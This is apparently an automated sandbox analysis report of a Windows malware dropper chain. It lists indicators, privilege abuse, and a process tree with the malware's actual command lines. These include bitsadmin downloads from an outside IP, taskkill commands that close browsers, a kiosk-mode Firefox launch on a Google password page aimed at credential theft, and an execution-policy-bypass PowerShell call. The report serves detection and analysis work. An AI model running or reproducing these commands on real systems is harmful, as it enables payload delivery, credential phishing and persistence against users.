Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 1964 taskkill.exe 4020 taskkill.exe 2488 taskkill.exe 2096 taskkill.exe 4236 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
firefox.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings firefox.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
SystemCare1.0.exepid Process 6260 SystemCare1.0.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
1u88t3.exeskotes.exe2S9414.exe3u36Z.exe4I541V.exe4c31b50e86.exe0a0f83ad13.exeskotes.exea3585e9f5b.exef7f273ba81.exef995b4d7bd.exef3c5ac255a.exemsiexec.exepowershell.exeSystemCare1.0.exepowershell.exeae1a903027.exepowershell.exepid Process 2216 1u88t3.exe 2216 1u88t3.exe 4144 skotes.exe 4144 skotes.exe 1708 2S9414.exe 1708 2S9414.exe 2008 3u36Z.exe 2008 3u36Z.exe 4844 4I541V.exe 4844 4I541V.exe 4844 4I541V.exe 4844 4I541V.exe 1352 4c31b50e86.exe 1352 4c31b50e86.exe 2352 0a0f83ad13.exe 2352 0a0f83ad13.exe 3724 skotes.exe 3724 skotes.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 3104 f7f273ba81.exe 3104 f7f273ba81.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 3104 f7f273ba81.exe 3104 f7f273ba81.exe 3104 f7f273ba81.exe 6376 f995b4d7bd.exe 6376 f995b4d7bd.exe 6376 f995b4d7bd.exe 6376 f995b4d7bd.exe 6376 f995b4d7bd.exe 6376 f995b4d7bd.exe 6376 f995b4d7bd.exe 6376 f995b4d7bd.exe 6376 f995b4d7bd.exe 6376 f995b4d7bd.exe 5768 f3c5ac255a.exe 5768 f3c5ac255a.exe 5768 f3c5ac255a.exe 5768 f3c5ac255a.exe 5768 f3c5ac255a.exe 5768 f3c5ac255a.exe 5768 f3c5ac255a.exe 5768 f3c5ac255a.exe 5768 f3c5ac255a.exe 5768 f3c5ac255a.exe 1736 msiexec.exe 1736 msiexec.exe 6432 powershell.exe 6432 powershell.exe 6432 powershell.exe 6260 SystemCare1.0.exe 6260 SystemCare1.0.exe 7124 powershell.exe 7124 powershell.exe 7124 powershell.exe 5520 ae1a903027.exe 5520 ae1a903027.exe 7124 powershell.exe 7124 powershell.exe 5860 powershell.exe 5860 powershell.exe 5860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
4I541V.exemsiexec.exeTcMBq5M.exedescription pid Process Token: SeDebugPrivilege 4844 4I541V.exe Token: SeSecurityPrivilege 1736 msiexec.exe Token: SeCreateTokenPrivilege 3996 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 3996 TcMBq5M.exe Token: SeLockMemoryPrivilege 3996 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 3996 TcMBq5M.exe Token: SeMachineAccountPrivilege 3996 TcMBq5M.exe Token: SeTcbPrivilege 3996 TcMBq5M.exe Token: SeSecurityPrivilege 3996 TcMBq5M.exe Token: SeTakeOwnershipPrivilege 3996 TcMBq5M.exe Token: SeLoadDriverPrivilege 3996 TcMBq5M.exe Token: SeSystemProfilePrivilege 3996 TcMBq5M.exe Token: SeSystemtimePrivilege 3996 TcMBq5M.exe Token: SeProfSingleProcessPrivilege 3996 TcMBq5M.exe Token: SeIncBasePriorityPrivilege 3996 TcMBq5M.exe Token: SeCreatePagefilePrivilege 3996 TcMBq5M.exe Token: SeCreatePermanentPrivilege 3996 TcMBq5M.exe Token: SeBackupPrivilege 3996 TcMBq5M.exe Token: SeRestorePrivilege 3996 TcMBq5M.exe Token: SeShutdownPrivilege 3996 TcMBq5M.exe Token: SeDebugPrivilege 3996 TcMBq5M.exe Token: SeAuditPrivilege 3996 TcMBq5M.exe Token: SeSystemEnvironmentPrivilege 3996 TcMBq5M.exe Token: SeChangeNotifyPrivilege 3996 TcMBq5M.exe Token: SeRemoteShutdownPrivilege 3996 TcMBq5M.exe Token: SeUndockPrivilege 3996 TcMBq5M.exe Token: SeSyncAgentPrivilege 3996 TcMBq5M.exe Token: SeEnableDelegationPrivilege 3996 TcMBq5M.exe Token: SeManageVolumePrivilege 3996 TcMBq5M.exe Token: SeImpersonatePrivilege 3996 TcMBq5M.exe Token: SeCreateGlobalPrivilege 3996 TcMBq5M.exe Token: SeCreateTokenPrivilege 3996 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 3996 TcMBq5M.exe Token: SeLockMemoryPrivilege 3996 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 3996 TcMBq5M.exe Token: SeMachineAccountPrivilege 3996 TcMBq5M.exe Token: SeTcbPrivilege 3996 TcMBq5M.exe Token: SeSecurityPrivilege 3996 TcMBq5M.exe Token: SeTakeOwnershipPrivilege 3996 TcMBq5M.exe Token: SeLoadDriverPrivilege 3996 TcMBq5M.exe Token: SeSystemProfilePrivilege 3996 TcMBq5M.exe Token: SeSystemtimePrivilege 3996 TcMBq5M.exe Token: SeProfSingleProcessPrivilege 3996 TcMBq5M.exe Token: SeIncBasePriorityPrivilege 3996 TcMBq5M.exe Token: SeCreatePagefilePrivilege 3996 TcMBq5M.exe Token: SeCreatePermanentPrivilege 3996 TcMBq5M.exe Token: SeBackupPrivilege 3996 TcMBq5M.exe Token: SeRestorePrivilege 3996 TcMBq5M.exe Token: SeShutdownPrivilege 3996 TcMBq5M.exe Token: SeDebugPrivilege 3996 TcMBq5M.exe Token: SeAuditPrivilege 3996 TcMBq5M.exe Token: SeSystemEnvironmentPrivilege 3996 TcMBq5M.exe Token: SeChangeNotifyPrivilege 3996 TcMBq5M.exe Token: SeRemoteShutdownPrivilege 3996 TcMBq5M.exe Token: SeUndockPrivilege 3996 TcMBq5M.exe Token: SeSyncAgentPrivilege 3996 TcMBq5M.exe Token: SeEnableDelegationPrivilege 3996 TcMBq5M.exe Token: SeManageVolumePrivilege 3996 TcMBq5M.exe Token: SeImpersonatePrivilege 3996 TcMBq5M.exe Token: SeCreateGlobalPrivilege 3996 TcMBq5M.exe Token: SeCreateTokenPrivilege 3996 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 3996 TcMBq5M.exe Token: SeLockMemoryPrivilege 3996 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 3996 TcMBq5M.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
Processes:
TcMBq5M.exemsiexec.exea3585e9f5b.exefirefox.exepid Process 3996 TcMBq5M.exe 32 msiexec.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 32 msiexec.exe -
Suspicious use of SendNotifyMessage 30 IoCs
Processes:
a3585e9f5b.exefirefox.exepid Process 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1464 firefox.exe 1700 a3585e9f5b.exe 1700 a3585e9f5b.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
firefox.exeSystemCare1.0.exepid Process 1464 firefox.exe 6260 SystemCare1.0.exe 6260 SystemCare1.0.exe 6260 SystemCare1.0.exe 6260 SystemCare1.0.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
d6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exec5V11.exeQ3f32.exe1u88t3.exeskotes.exetvtC9D3.exeuxN4wDZ.exemsiexec.exeTcMBq5M.exedescription pid Process procid_target PID 3164 wrote to memory of 2316 3164 d6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exe 85 PID 3164 wrote to memory of 2316 3164 d6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exe 85 PID 3164 wrote to memory of 2316 3164 d6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exe 85 PID 2316 wrote to memory of 4272 2316 c5V11.exe 86 PID 2316 wrote to memory of 4272 2316 c5V11.exe 86 PID 2316 wrote to memory of 4272 2316 c5V11.exe 86 PID 4272 wrote to memory of 2216 4272 Q3f32.exe 87 PID 4272 wrote to memory of 2216 4272 Q3f32.exe 87 PID 4272 wrote to memory of 2216 4272 Q3f32.exe 87 PID 2216 wrote to memory of 4144 2216 1u88t3.exe 88 PID 2216 wrote to memory of 4144 2216 1u88t3.exe 88 PID 2216 wrote to memory of 4144 2216 1u88t3.exe 88 PID 4272 wrote to memory of 1708 4272 Q3f32.exe 89 PID 4272 wrote to memory of 1708 4272 Q3f32.exe 89 PID 4272 wrote to memory of 1708 4272 Q3f32.exe 89 PID 2316 wrote to memory of 2008 2316 c5V11.exe 93 PID 2316 wrote to memory of 2008 2316 c5V11.exe 93 PID 2316 wrote to memory of 2008 2316 c5V11.exe 93 PID 3164 wrote to memory of 4844 3164 d6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exe 98 PID 3164 wrote to memory of 4844 3164 d6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exe 98 PID 3164 wrote to memory of 4844 3164 d6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exe 98 PID 4144 wrote to memory of 3136 4144 skotes.exe 99 PID 4144 wrote to memory of 3136 4144 skotes.exe 99 PID 4144 wrote to memory of 3136 4144 skotes.exe 99 PID 3136 wrote to memory of 4024 3136 tvtC9D3.exe 100 PID 3136 wrote to memory of 4024 3136 tvtC9D3.exe 100 PID 3136 wrote to memory of 4024 3136 tvtC9D3.exe 100 PID 3136 wrote to memory of 3576 3136 tvtC9D3.exe 102 PID 3136 wrote to memory of 3576 3136 tvtC9D3.exe 102 PID 3136 wrote to memory of 3576 3136 tvtC9D3.exe 102 PID 4144 wrote to memory of 3856 4144 skotes.exe 113 PID 4144 wrote to memory of 3856 4144 skotes.exe 113 PID 4144 wrote to memory of 3856 4144 skotes.exe 113 PID 3856 wrote to memory of 4136 3856 uxN4wDZ.exe 115 PID 3856 wrote to memory of 4136 3856 uxN4wDZ.exe 115 PID 3856 wrote to memory of 4136 3856 uxN4wDZ.exe 115 PID 3856 wrote to memory of 4136 3856 uxN4wDZ.exe 115 PID 3856 wrote to memory of 4136 3856 uxN4wDZ.exe 115 PID 3856 wrote to memory of 4136 3856 uxN4wDZ.exe 115 PID 3856 wrote to memory of 4136 3856 uxN4wDZ.exe 115 PID 3856 wrote to memory of 4136 3856 uxN4wDZ.exe 115 PID 3856 wrote to memory of 4136 3856 uxN4wDZ.exe 115 PID 3856 wrote to memory of 4136 3856 uxN4wDZ.exe 115 PID 3136 wrote to memory of 2172 3136 tvtC9D3.exe 119 PID 3136 wrote to memory of 2172 3136 tvtC9D3.exe 119 PID 3136 wrote to memory of 2172 3136 tvtC9D3.exe 119 PID 4144 wrote to memory of 3996 4144 skotes.exe 122 PID 4144 wrote to memory of 3996 4144 skotes.exe 122 PID 4144 wrote to memory of 3996 4144 skotes.exe 122 PID 1736 wrote to memory of 1224 1736 msiexec.exe 127 PID 1736 wrote to memory of 1224 1736 msiexec.exe 127 PID 1736 wrote to memory of 1224 1736 msiexec.exe 127 PID 3996 wrote to memory of 32 3996 TcMBq5M.exe 128 PID 3996 wrote to memory of 32 3996 TcMBq5M.exe 128 PID 3996 wrote to memory of 32 3996 TcMBq5M.exe 128 PID 4144 wrote to memory of 1352 4144 skotes.exe 132 PID 4144 wrote to memory of 1352 4144 skotes.exe 132 PID 4144 wrote to memory of 1352 4144 skotes.exe 132 PID 4144 wrote to memory of 2352 4144 skotes.exe 134 PID 4144 wrote to memory of 2352 4144 skotes.exe 134 PID 4144 wrote to memory of 2352 4144 skotes.exe 134 PID 4144 wrote to memory of 1700 4144 skotes.exe 135 PID 4144 wrote to memory of 1700 4144 skotes.exe 135 PID 4144 wrote to memory of 1700 4144 skotes.exe 135 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\d6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exe"C:\Users\Admin\AppData\Local\Temp\d6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5V11.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5V11.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Q3f32.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Q3f32.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1u88t3.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1u88t3.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe"C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\SysWOW64\ping.exeping -n 1 8.8.8.87⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4024
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"7⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:3576
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"7⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2172
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4136
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe"C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe"6⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\Click2Profit.msi AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1009928001\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1732582112 " AI_EUIMSI=""7⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:32
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009987001\4c31b50e86.exe"C:\Users\Admin\AppData\Local\Temp\1009987001\4c31b50e86.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1352
-
-
C:\Users\Admin\AppData\Local\Temp\1009988001\0a0f83ad13.exe"C:\Users\Admin\AppData\Local\Temp\1009988001\0a0f83ad13.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2352
-
-
C:\Users\Admin\AppData\Local\Temp\1009989001\a3585e9f5b.exe"C:\Users\Admin\AppData\Local\Temp\1009989001\a3585e9f5b.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1700 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2096
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4236
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1964
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2488
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:752
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1464 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2068 -parentBuildID 20240401114208 -prefsHandle 1984 -prefMapHandle 1976 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0cdbe88-db9f-4697-8c63-5f79e03a7c5a} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" gpu9⤵PID:4884
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2508 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2404 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9be68f0b-e84a-414e-8a7d-34dd41608413} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" socket9⤵PID:2980
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2832 -childID 1 -isForBrowser -prefsHandle 3100 -prefMapHandle 3096 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1056 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {749f8b7e-e0bd-48be-a321-f4992d9b2774} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" tab9⤵PID:1980
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3940 -childID 2 -isForBrowser -prefsHandle 3932 -prefMapHandle 3240 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1056 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e5db8d8-c0b1-4d5e-8038-e10d34889836} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" tab9⤵PID:4760
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4656 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4644 -prefMapHandle 4640 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2e2a77d-c11b-42c2-8d1f-1cbb160d7f93} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" utility9⤵
- Checks processor information in registry
PID:5360
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5144 -childID 3 -isForBrowser -prefsHandle 5132 -prefMapHandle 5128 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1056 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6323d72-a0f2-4b7e-9084-f484c85f7d77} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" tab9⤵PID:6764
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5300 -childID 4 -isForBrowser -prefsHandle 5376 -prefMapHandle 5372 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1056 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c37f7b2b-941c-4b94-8811-ba06a1769cdd} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" tab9⤵PID:4256
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5276 -childID 5 -isForBrowser -prefsHandle 5520 -prefMapHandle 5528 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1056 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce63b38b-276e-4284-8af2-14f6bbdecd73} 1464 "\\.\pipe\gecko-crash-server-pipe.1464" tab9⤵PID:4876
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009990001\f7f273ba81.exe"C:\Users\Admin\AppData\Local\Temp\1009990001\f7f273ba81.exe"6⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3104
-
-
C:\Users\Admin\AppData\Local\Temp\1009991001\f995b4d7bd.exe"C:\Users\Admin\AppData\Local\Temp\1009991001\f995b4d7bd.exe"6⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6376
-
-
C:\Users\Admin\AppData\Local\Temp\1009992001\f3c5ac255a.exe"C:\Users\Admin\AppData\Local\Temp\1009992001\f3c5ac255a.exe"6⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5768
-
-
C:\Users\Admin\AppData\Local\Temp\1009993001\ae1a903027.exe"C:\Users\Admin\AppData\Local\Temp\1009993001\ae1a903027.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5520 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 16127⤵
- Program crash
PID:5764
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2S9414.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2S9414.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1708
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3u36Z.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3u36Z.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4I541V.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4I541V.exe2⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Drops startup file
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A49DB599146CFD8FF01B482FE7C54BE3 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1224
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:5704
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AE9F5CA904D5097F8C7F35790B4FA3042⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss123.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi11F.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr120.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr121.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6432
-
-
-
